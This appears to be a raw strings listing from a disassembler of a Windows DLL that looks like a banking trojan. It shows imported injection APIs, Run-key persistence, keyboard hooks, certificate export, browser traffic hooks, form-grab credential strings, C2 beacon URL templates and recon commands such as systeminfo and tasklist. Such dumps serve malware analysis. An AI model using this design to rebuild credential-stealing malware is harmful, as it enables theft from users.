- .rdata:10012230 0000000A C PSAPI.DLL
- .rdata:10012240 0000000C C WININET.dll
- .rdata:10012250 0000000C C SHLWAPI.dll
- .rdata:10012260 0000000C C gdiplus.dll
- .rdata:10012270 0000000A C nspr4.dll
- .rdata:10012280 0000000B C WS2_32.dll
- .rdata:10012290 0000000C C CRYPT32.dll
- .rdata:100122A0 0000000B C USER32.dll
- .rdata:100122B0 0000000A C GDI32.dll
- .rdata:100122C0 0000000D C ADVAPI32.dll
- .rdata:100122D0 0000000C C SHELL32.dll
- .rdata:100122E0 0000000A C ole32.dll
- .rdata:100122EC 00000015 C CreateProcessAsUserA
- .rdata:10012304 00000015 C CreateProcessAsUserW
- .rdata:1001231C 0000000D C advapi32.dll
- .rdata:1001232C 0000000F C CreateProcessA
- .rdata:1001233C 0000000F C CreateProcessW
- .rdata:1001234C 0000000D C kernel32.dll
- .rdata:1001235C 00000017 C NtProtectVirtualMemory
- .rdata:10012374 00000017 C LdrGetProcedureAddress
- .rdata:1001238C 0000000B C LdrLoadDll
- .rdata:10012398 0000000A C NTDLL.DLL
- .rdata:100123A4 00000015 C ZwWriteVirtualMemory
- .rdata:100123BC 00000017 C ZwProtectVirtualMemory
- .rdata:100123D4 00000010 C CryptGetUserKey
- .rdata:100123E4 0000000D C ADVAPI32.DLL
- .rdata:100123F4 00000005 C .pfx
- .rdata:1001240C 0000000C C AddressBook
- .rdata:10012418 00000009 C AuthRoot
- .rdata:10012424 00000015 C CertificateAuthority
- .rdata:1001243C 0000000B C Disallowed
- .rdata:10012448 00000005 C Root
- .rdata:10012450 0000000E C TrustedPeople
- .rdata:10012460 00000011 C TrustedPublisher
- .rdata:10012474 0000000B C start rbt\n
- .rdata:10012480 0000000F C adjust succes\n
- .rdata:10012490 0000000D C exit succes\n
- .rdata:100124A0 00000007 C \\\\.\\%s
- .rdata:100124A8 00000008 C %lu.exe
- .rdata:100124B0 0000002E C Software\\Microsoft\\Windows\\CurrentVersion\\Run
- .rdata:100124E4 00000010 C Sart Load DLL\r\n
- .rdata:100124F4 0000001D C Loading DLL: \"%s\" size: %d\r\n
- .rdata:10012514 00000012 C Start Write DLL\r\n
- .rdata:10012528 00000016 C DLL load status: %u\r\n
- .rdata:10012658 0000001C C Started Soccks status {%u\n}
- .rdata:10012674 00000014 C Get info status %u\n
- .rdata:10012688 00000017 C Command received \"%s\"\n
- .rdata:100126A0 0000000C C MakeScreen\n
- .rdata:100126AC 00000008 C FAILED\n
- .rdata:100126B4 0000000D C /t%s.php?%s=
- .rdata:100126C4 00000011 C 0123456789ABCDEF
- .rdata:100126D8 00000010 C 192.168.222.128
- .rdata:100126E8 00000005 C form
- .rdata:100126F0 0000004B C /data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
- .rdata:1001273C 00000007 C Client
- .rdata:10012744 00000005 C Main
- .rdata:1001274C 00000005 C FILE
- .rdata:10012758 0000007B C version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%08X&wake=%u&prjct=%d&arch=%u&inf=0&os=%u.%u.%u&guid=%u.%u.%u!%s!%08X
- .rdata:100127D8 0000000D C /c%s.php?%s=
- .rdata:100127E8 0000000B C CHROME.DLL
- .rdata:100127F4 0000000C C closesocket
- .rdata:10012800 00000008 C WSASend
- .rdata:10012808 00000008 C WSARecv
- .rdata:10012810 0000000B C WS2_32.DLL
- .rdata:1001281C 0000000F C LoadLibraryExW
- .rdata:1001282C 0000000D C KERNEL32.DLL
- .rdata:1001283C 00000007 C .rdata
- .rdata:10012848 00000006 C .text
- .rdata:10012854 00000009 C PR_Close
- .rdata:10012860 00000009 C PR_Write
- .rdata:1001286C 00000008 C PR_Read
- .rdata:10012874 0000000A C NSPR4.DLL
- .rdata:10012880 0000000A C nspr4.dll
- .rdata:1001289C 00000007 C Local\\
- .rdata:100128A4 0000001B C .set DiskDirectory1=\"%s\"\r\n
- .rdata:100128C0 00000019 C .set CabinetName1=\"%s\"\r\n
- .rdata:100128DC 00000007 C \"%s\"\r\n
- .rdata:100128EC 0000001B C .set DestinationDir=\"%S\"\r\n
- .rdata:1001290C 00000007 C \"%S\"\r\n
- .rdata:10012914 00000014 C makecab.exe /F \"%s\"
- .rdata:10012928 0000000B C \\setup.inf
- .rdata:10012934 0000000B C \\setup.rpt
- .rdata:10012940 00000005 C \\*.*
- .rdata:10012948 0000001D C cmd /C \"systeminfo.exe > %s\"
- .rdata:10012968 0000001B C failed start sysinfo - %u\n
- .rdata:10012984 0000001D C cmd /C \"echo -------- >> %s\"
- .rdata:100129A4 00000021 C cmd /C \"tasklist.exe /SVC >> %s\"
- .rdata:100129C8 0000001C C failed start tasklist - %u\n
- .rdata:100129E4 0000001F C cmd /C \"driverquery.exe >> %s\"
- .rdata:10012A04 0000001A C failed start driver - %u\n
- .rdata:10012A20 0000005B C cmd /C \"reg.exe query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" /s >> %s\"
- .rdata:10012A7C 00000015 C failed get reg - %u\n
- .rdata:10012A94 00000006 C Host:
- .rdata:10012A9C 0000000C C User-Agent:
- .rdata:10012AA8 00000010 C Content-Length:
- .rdata:10012AB8 00000013 C Transfer-Encoding:
- .rdata:10012ACC 00000017 C HttpAddRequestHeadersW
- .rdata:10012AE4 00000017 C HttpAddRequestHeadersA
- .rdata:10012AFC 0000000F C HttpQueryInfoW
- .rdata:10012B0C 0000000F C HttpQueryInfoA
- .rdata:10012B1C 00000011 C InternetConnectW
- .rdata:10012B30 00000011 C InternetConnectA
- .rdata:10012B44 0000001B C InternetQueryDataAvailable
- .rdata:10012B60 00000011 C HttpSendRequestW
- .rdata:10012B74 00000011 C HttpSendRequestA
- .rdata:10012B88 00000014 C InternetReadFileExW
- .rdata:10012B9C 00000014 C InternetReadFileExA
- .rdata:10012BB0 00000011 C InternetReadFile
- .rdata:10012BC4 0000000C C WININET.DLL
- .rdata:10012BD0 0000000C C WININET.dll
- .rdata:10012BDC 0000000A C text/html
- .rdata:10012BE8 00000006 C image
- .rdata:10012BF0 0000000A C Referer:
- .rdata:10012BFC 0000001A C URL: %s\r\nuser=%s\r\npass=%s
- .rdata:10012C18 0000000A C identity
- .rdata:10012C24 00000011 C Accept-Encoding:
- .rdata:10012C38 00000005 C \t\r\n
- .rdata:10012C44 0000001F C {%08X-%04X-%04X-%04X-%08X%04X}
- .rdata:10012C64 00000008 C http://
- .rdata:10012C6C 00000009 C https://
- .rdata:10012C90 00000011 C %08x%08x%08x%08x
- .rdata:10012CA4 00000005 C @ID@
- .rdata:10012CB0 00000008 C @GROUP@
- .rdata:10012CB8 00000007 C grabs=
- .rdata:10012CC0 00000008 C NEWGRAB
- .rdata:10012CC8 0000000B C SCREENSHOT
- .rdata:10012CD4 00000008 C PROCESS
- .rdata:10012CDC 00000007 C HIDDEN
- .rdata:10012CE4 00000005 C @%s@
- .rdata:10012CEC 00000005 C http
- .rdata:10012CF4 00000005 C POST
- .rdata:10012CFC 0000000A C URL: %s\r\n
- .rdata:10012D08 0000000C C ExitProcess
- .rdata:10012D14 00000010 C %02u:%02u:%02u
- .rdata:10012D24 00000008 C /fp %lu
- .rdata:10012D2C 00000005 C %x\r\n
- .rdata:10012D34 00000017 C Content-Length: %u\r\n\r\n
- .rdata:10012D4C 00000005 C \r\n\r\n
- .rdata:10012D54 0000000E C Content-Type:
- .rdata:10012D64 00000008 C chunked
- .rdata:10012D6C 00000005 C ocsp
- .rdata:10012D74 00000015 C SOFTWARE\\AppDataLow\\
- .rdata:10012D8C 00000006 C \\Vars
- .rdata:10012D94 0000000A C \\\\.\\pipe\\
- .rdata:10012DA0 0000000C C \\Microsoft\\
- .rdata:10012DAC 00000010 C S:(ML;;NW;;;LW)
- .rdata:10012DC0 00000043 C D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)
- .rdata:10012E10 00000042 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%s\"
- .rdata:10012E58 00000048 C Content-Disposition: form-data; name=\"upload_file\"; filename=\"%.4u.%lu\"
- .rdata:10012EA0 00000027 C --------------------------%04x%04x%04x
- .rdata:10012EC8 0000002F C Content-Type: multipart/form-data; boundary=%s
- .rdata:10012EF8 0000000B C \r\n--%s--\r\n
- .rdata:10012F04 00000027 C Content-Type: application/octet-stream
- .rdata:10012F2C 00000011 C --%s\r\n%s\r\n%s\r\n\r\n
- .rdata:10012F40 0000000F C IsWow64Process
- .rdata:10012F50 00000009 C kernel32
- .rdata:10012F5C 00000007 C UNKNOW
- .rdata:10012F64 00000021 C ZwWow64QueryInformationProcess64
- .rdata:10012F88 0000000A C ntdll.dll
- .rdata:10012F94 00000005 C .dll
- .rdata:10012F9C 0000000D C LoadLibraryA
- .rdata:10012FAC 0000001B C ZwWow64ReadVirtualMemory64
- .rdata:10012FC8 00000013 C ZwGetContextThread
- .rdata:10012FDC 00000013 C ZwSetContextThread
- .rdata:10012FF0 00000005 C open
- .rdata:10012FF8 0000001D C %08X-%04X-%04X-%04X-%08X%04X
- .rdata:10013018 0000000B C kernelbase
- .rdata:10013024 00000006 C ntdll
- .rdata:1001302C 00000007 C %s=%s&
- .rdata:10013039 00000040 C BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- .rdata:10013080 00000051 C |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\]^_`abcdefghijklmnopq
- .rdata:100130D4 00000012 C SetWindowsHookExW
- .rdata:100130E8 00000012 C SetWindowsHookExA
- .rdata:100130FC 0000000B C user32.dll
- .rdata:1001313C 00000011 C SetThreadDesktop
- .rdata:10013150 00000011 C TranslateMessage
- .rdata:10013164 0000001A C CreateDialogIndirectParam
- .rdata:10013180 00000013 C CreateDialogParamW
- .rdata:10013194 00000013 C CreateDialogParamA
- .rdata:100131A8 00000017 C DialogBoxIndirectParam
- .rdata:100131C0 00000010 C DialogBoxParamW
- .rdata:100131D0 00000010 C DialogBoxParamA
- .rdata:100131E0 00000010 C CreateWindowExW
- .rdata:100131F0 00000010 C CreateWindowExA
- .rdata:10013200 0000000E C CreateWindowW
- .rdata:10013210 0000000E C CreateWindowA
- .rdata:10013616 00000013 C GetMappedFileNameA
- .rdata:1001362C 00000014 C DeleteUrlCacheEntry
- .rdata:10013642 00000018 C FindFirstUrlCacheEntryA
- .rdata:1001365C 00000017 C FindNextUrlCacheEntryA
- .rdata:10013676 00000012 C FindCloseUrlCache
- .rdata:1001368A 0000000F C HttpQueryInfoA
- .rdata:1001369C 00000011 C InternetConnectA
- .rdata:100136B0 0000001B C InternetQueryDataAvailable
- .rdata:100136CE 00000014 C InternetReadFileExA
- .rdata:100136E4 00000011 C InternetReadFile
- .rdata:100136F8 00000011 C InternetConnectW
- .rdata:1001370C 00000011 C HttpSendRequestW
- .rdata:10013720 00000017 C HttpAddRequestHeadersW
- .rdata:1001373A 0000000F C HttpQueryInfoW
- .rdata:1001374C 00000014 C InternetReadFileExW
- .rdata:10013762 00000017 C HttpAddRequestHeadersA
- .rdata:1001377C 0000001A C InternetSetStatusCallback
- .rdata:10013798 00000011 C HttpSendRequestA
- .rdata:100137AC 00000015 C InternetQueryOptionA
- .rdata:100137C4 00000013 C InternetSetOptionA
- .rdata:100137DA 00000011 C HttpOpenRequestA
- .rdata:100137EE 0000000E C InternetOpenA
- .rdata:100137FE 00000014 C InternetCloseHandle
- .rdata:10013814 00000009 C StrRChrA
- .rdata:10013820 00000008 C StrChrW
- .rdata:1001382A 0000000A C StrToIntA
- .rdata:10013836 00000008 C StrChrA
- .rdata:10013840 00000009 C StrTrimA
- .rdata:1001384C 00000009 C StrStrIA
- .rdata:10013858 00000009 C StrRChrW
- .rdata:10013864 00000008 C StrStrA
- .rdata:1001386E 00000009 C StrCmpNA
- .rdata:1001387A 0000000C C StrToIntExA
- .rdata:10013888 00000008 C StrDupA
- .rdata:10013892 00000016 C GdipSaveImageToStream
- .rdata:100138AA 00000019 C GdipGetImageEncodersSize
- .rdata:100138C6 00000011 C GdipDisposeImage
- .rdata:100138DA 0000001C C GdipCreateBitmapFromHBITMAP
- .rdata:100138F8 00000015 C GdipGetImageEncoders
- .rdata:10013910 0000000F C GdiplusStartup
- .rdata:10013922 00000008 C PR_Poll
- .rdata:1001392C 0000000C C PR_GetError
- .rdata:1001393A 00000008 C PR_Read
- .rdata:10013944 00000009 C PR_Write
- .rdata:10013950 0000000C C PR_SetError
- .rdata:1001395E 00000009 C PR_Close
- .rdata:1001396A 0000000F C WSACreateEvent
- .rdata:1001397C 0000000F C WSAEventSelect
- .rdata:1001398E 00000015 C WSAEnumNetworkEvents
- .rdata:100139A6 00000008 C WSASend
- .rdata:100139B0 00000008 C WSARecv
- .rdata:100139BA 0000000C C WSASetEvent
- .rdata:100139C8 0000000E C WSACloseEvent
- .rdata:100139D8 00000015 C CertOpenSystemStoreW
- .rdata:100139F0 0000000F C CertCloseStore
- .rdata:10013A02 0000001C C CertEnumCertificatesInStore
- .rdata:10013A20 00000015 C PFXExportCertStoreEx
- .rdata:10013A38 0000000E C ExitWindowsEx
- .rdata:10013A48 0000000A C wsprintfA
- .rdata:10013A54 00000011 C GetDesktopWindow
- .rdata:10013A68 00000014 C GetForegroundWindow
- .rdata:10013A7E 0000000C C GetWindowDC
- .rdata:10013A8C 0000000E C GetWindowRect
- .rdata:10013A9C 0000000F C GetShellWindow
- .rdata:10013AAE 00000019 C GetWindowThreadProcessId
- .rdata:10013ACA 00000017 C CreateCompatibleBitmap
- .rdata:10013AE4 00000013 C CreateCompatibleDC
- .rdata:10013AFA 0000000D C SelectObject
- .rdata:10013B0A 0000000D C DeleteObject
- .rdata:10013B1A 00000009 C DeleteDC
- .rdata:10013B26 00000007 C BitBlt
- .rdata:10013B30 00000010 C CryptGetUserKey
- .rdata:10013B42 0000000F C RegSetValueExA
- .rdata:10013B54 0000000E C RegCreateKeyA
- .rdata:10013B64 0000000C C RegCloseKey
- .rdata:10013B72 00000011 C RegQueryValueExA
- .rdata:10013B86 00000018 C RegNotifyChangeKeyValue
- .rdata:10013BA0 0000000C C RegOpenKeyA
- .rdata:10013BAE 0000000E C RegEnumValueA
- .rdata:10013BBE 00000011 C SHGetFolderPathW
- .rdata:10013BD2 00000011 C SHGetFolderPathA
- .rdata:10013BE6 0000000D C CoCreateGuid
- .rdata:10013BF6 00000016 C CreateStreamOnHGlobal
- .rdata:10013C0E 00000015 C GetHGlobalFromStream
- .rdata:10013C26 00000013 C EnumProcessModules
- .rdata:10013C3C 00000015 C GetModuleFileNameExW
- .rdata:10013C54 0000000C C ToUnicodeEx
- .rdata:10013C62 00000014 C UnhookWindowsHookEx
- .rdata:10013C78 00000012 C SetWindowsHookExA
- .rdata:10013C8C 0000000C C GetAncestor
- .rdata:10013C9A 00000012 C GetKeyboardLayout
- .rdata:10013CAE 00000011 C GetKeyboardState
- .rdata:10013CC2 0000000F C CallNextHookEx
- .rdata:10013CD4 0000000F C GetWindowTextW
- .rdata:10013CE6 0000000A C wsprintfW
- .rdata:10013CF2 00000015 C CreateProcessAsUserA
- .rdata:10013D0A 00000015 C CreateProcessAsUserW
- .rdata:10013D22 00000035 C ConvertStringSecurityDescriptorToSecurityDescriptorA
- .rdata:10013D5A 0000000E C ShellExecuteA
- .rdata:100141DE 00000007 C memset
- .rdata:100141E8 00000013 C RtlAdjustPrivilege
- .rdata:100141FE 00000007 C memcpy
- .rdata:10014208 00000007 C wcscpy
- .rdata:10014212 00000009 C mbstowcs
- .rdata:1001421E 00000009 C wcstombs
- .rdata:1001422A 00000007 C strcpy
- .rdata:10014234 00000008 C _strupr
- .rdata:1001423E 00000007 C strstr
- .rdata:10014246 0000000A C ntdll.dll
- .rdata:10014252 0000000C C CreateFileA
- .rdata:10014260 00000009 C lstrlenA
- .rdata:1001426C 0000000A C HeapAlloc
- .rdata:10014278 00000009 C HeapFree
- .rdata:10014284 0000000A C WriteFile
- .rdata:10014290 00000009 C lstrcatA
- .rdata:1001429C 00000011 C CreateDirectoryA
- .rdata:100142B0 0000000D C GetLastError
- .rdata:100142C0 00000011 C RemoveDirectoryA
- .rdata:100142D4 0000000D C LoadLibraryA
- .rdata:100142E4 0000000C C CloseHandle
- .rdata:100142F2 0000000C C DeleteFileA
- .rdata:10014300 00000009 C lstrcpyA
- .rdata:1001430C 0000000C C HeapReAlloc
- .rdata:1001431A 00000015 C InterlockedIncrement
- .rdata:10014332 00000015 C InterlockedDecrement
- .rdata:1001434A 00000009 C SetEvent
- .rdata:10014356 0000000D C GetTickCount
- .rdata:10014366 0000000C C HeapDestroy
- .rdata:10014374 0000000B C HeapCreate
- .rdata:10014382 00000013 C GetCurrentThreadId
- .rdata:10014398 00000011 C CreateDirectoryW
- .rdata:100143AC 00000015 C GetWindowsDirectoryA
- .rdata:100143C4 00000006 C Sleep
- .rdata:100143CC 0000000A C CopyFileW
- .rdata:100143D8 00000009 C lstrlenW
- .rdata:100143E4 00000011 C GetModuleHandleA
- .rdata:100143F8 00000009 C lstrcatW
- .rdata:10014404 0000000C C DeleteFileW
- .rdata:10014412 0000000D C GetTempPathA
- .rdata:10014422 0000000E C MapViewOfFile
- .rdata:10014432 00000010 C UnmapViewOfFile
- .rdata:10014444 00000011 C SetWaitableTimer
- .rdata:10014458 00000012 C GetCurrentProcess
- .rdata:1001446C 0000000D C CreateEventA
- .rdata:1001447C 00000015 C LeaveCriticalSection
- .rdata:10014494 0000000A C lstrcmpiA
- .rdata:100144A0 00000015 C EnterCriticalSection
- .rdata:100144B8 00000017 C WaitForMultipleObjects
- .rdata:100144D2 0000000D C CreateMutexA
- .rdata:100144E2 0000000D C ReleaseMutex
- .rdata:100144F2 00000015 C CreateWaitableTimerA
- .rdata:1001450A 0000000F C UnregisterWait
- .rdata:1001451C 0000000F C LoadLibraryExW
- .rdata:1001452E 00000014 C WaitForSingleObject
- .rdata:10014544 0000000D C SetLastError
- .rdata:10014554 0000001C C RegisterWaitForSingleObject
- .rdata:10014572 0000000C C GetFileSize
- .rdata:10014580 0000000F C FindFirstFileW
- .rdata:10014592 0000000E C GetDriveTypeW
- .rdata:100145A2 00000018 C GetLogicalDriveStringsW
- .rdata:100145BC 0000001A C InitializeCriticalSection
- .rdata:100145D8 00000013 C GetFileAttributesA
- .rdata:100145EE 00000013 C GetFileAttributesW
- .rdata:10014604 0000000F C CreateProcessA
- .rdata:10014616 0000000C C CreateFileW
- .rdata:10014624 0000000F C FindFirstFileA
- .rdata:10014636 00000011 C GetTempFileNameA
- .rdata:1001464A 0000000A C FindClose
- .rdata:10014656 00000013 C CreateFileMappingA
- .rdata:1001466C 0000000E C FindNextFileA
- .rdata:1001467C 0000000E C FindNextFileW
- .rdata:1001468C 00000016 C DeleteCriticalSection
- .rdata:100146A4 00000011 C OpenFileMappingA
- .rdata:100146B8 0000000D C CreateThread
- .rdata:100146C8 0000000A C lstrcpynA
- .rdata:100146D4 00000009 C lstrcmpA
- .rdata:100146E0 0000000B C GlobalLock
- .rdata:100146EE 0000000D C GlobalUnlock
- .rdata:100146FE 0000000E C Thread32First
- .rdata:1001470E 0000000D C Thread32Next
- .rdata:1001471E 0000000F C GetProcAddress
- .rdata:10014730 0000000D C QueueUserAPC
- .rdata:10014740 0000000B C OpenThread
- .rdata:1001474E 00000019 C CreateToolhelp32Snapshot
- .rdata:1001476A 0000000F C CallNamedPipeA
- .rdata:1001477C 0000000F C WaitNamedPipeA
- .rdata:1001478E 00000011 C ConnectNamedPipe
- .rdata:100147A2 00000009 C ReadFile
- .rdata:100147AE 00000014 C GetOverlappedResult
- .rdata:100147C4 00000014 C DisconnectNamedPipe
- .rdata:100147DA 00000011 C FlushFileBuffers
- .rdata:100147EE 00000011 C CreateNamedPipeA
- .rdata:10014802 00000009 C CancelIo
- .rdata:1001480E 00000014 C GetCurrentProcessId
- .rdata:10014824 0000000E C GetSystemTime
- .rdata:10014834 00000009 C lstrcmpW
- .rdata:10014840 00000008 C SleepEx
- .rdata:1001484A 0000000B C ResetEvent
- .rdata:10014858 0000000B C LocalAlloc
- .rdata:10014866 0000000A C LocalFree
- .rdata:10014872 0000000C C FreeLibrary
- .rdata:10014880 00000014 C InterlockedExchange
- .rdata:10014896 0000000F C RaiseException
- .rdata:100148A6 0000000D C KERNEL32.dll
- .rdata:100148B6 00000016 C RtlNtStatusToDosError
- .rdata:100148CE 00000013 C NtMapViewOfSection
- .rdata:100148E4 00000015 C NtUnmapViewOfSection
- .rdata:100148FC 00000008 C ZwClose
- .rdata:10014906 00000010 C NtCreateSection
- .rdata:10014918 00000013 C NtSetContextThread
- .rdata:1001492E 0000001A C ZwQueryInformationProcess
- .rdata:1001494A 00000013 C NtGetContextThread
- .rdata:10014960 00000013 C ZwOpenProcessToken
- .rdata:10014976 0000000E C ZwOpenProcess
- .rdata:10014986 00000018 C ZwQueryInformationToken
- .rdata:100149A0 00000008 C sprintf
- .rdata:100149AA 00000013 C WriteProcessMemory
- .rdata:100149C0 00000011 C VirtualProtectEx
- .rdata:100149D4 00000012 C ReadProcessMemory
- .rdata:100149E8 0000000E C SuspendThread
- .rdata:100149F8 0000000D C ResumeThread
- .rdata:10014A08 0000000F C SwitchToThread
- .rdata:10014A1A 00000011 C GetThreadContext
- .rdata:10014A2E 0000000F C CreateProcessW
- .rdata:10014A40 00000011 C GetComputerNameA
- .rdata:10014A54 0000000B C GetVersion
- .rdata:10014A62 0000000F C SetFilePointer
- .rdata:10014A74 0000000C C VirtualFree
- .rdata:10014A82 00000013 C CreateRemoteThread
- .rdata:10014A98 0000000C C OpenProcess
- .rdata:10014AA6 0000000D C VirtualAlloc
- .rdata:10014AB6 0000000F C VirtualAllocEx
- .rdata:10014AC8 00000013 C GetModuleFileNameA
- .rdata:10014ADE 0000000F C VirtualProtect
- .rdata:10014AF0 00000012 C QueueUserWorkItem
- .rdata:10014B04 00000009 C _aulldiv
- .rdata:10014B10 00000008 C _allmul
- .rdata:10014B1A 0000000A C RtlUnwind
- .rdata:10014B26 00000015 C NtQueryVirtualMemory
- .rdata:10014B72 0000000B C client.dll
- .rdata:10014B7D 00000014 C CreateProcessNotify
- .data:1001518B 0000000D C SUVWATAUAVAWH
- .data:100151AF 00000005 C Hcz<H
- .data:1001545E 0000000D C HA_A^A]A\\_^][